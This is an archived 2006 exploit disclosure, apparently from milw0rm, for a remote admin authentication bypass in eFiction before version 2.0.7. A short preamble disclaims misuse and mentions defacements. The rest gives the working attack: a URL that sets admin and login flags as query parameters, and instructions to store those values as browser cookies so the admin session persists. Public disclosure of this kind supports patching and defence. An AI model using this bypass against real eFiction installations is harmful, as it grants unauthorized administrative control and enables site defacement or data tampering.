Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA21648] Fotopholder "path" Cross-Site Scripting Vulnerability

[Full-disclosure] [vuln.sg] Cybozu Garoon 2 SQL Injection Vulnerabilities

[Full-disclosure] [vuln.sg] Cybozu Products Arbitrary File Retrieval Vulnerability

Mambo/Joomla com_comprofiler Components <== v1.0 RC 2 Multiple Remote File Include Vulnerabilities

From:	MILW0RM <submit_(at)_milw0rm.com>
Date:	28.08.2006
Subject:	eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability

##########################################
# eFiction vulnerability
##########################################
# I am releasing this to the public. Vendor was notified. Someone is also illegally defacing
these websites under MY name, which is a shame because they ripped it from a private discussion
on g00ns.net. This proof of concept is not to be used to illegally hack websites. I do not condone,
nor act in this type of activity. I suggest whomever is defacing websites under my name stop,
since you would gain more notorioty under your own name.
##########################################

http://[target].com/efiction/index.
php?adminloggedin=1&loggedin=1&level=1

Use firefox's extension "add n edit cookies" to add these to your cookies so they stick.
(ie: instead of $_GET['loggedin'] its $_COOKIE['loggedin'] which stays with each page)

# milw0rm.com [2006-08-25]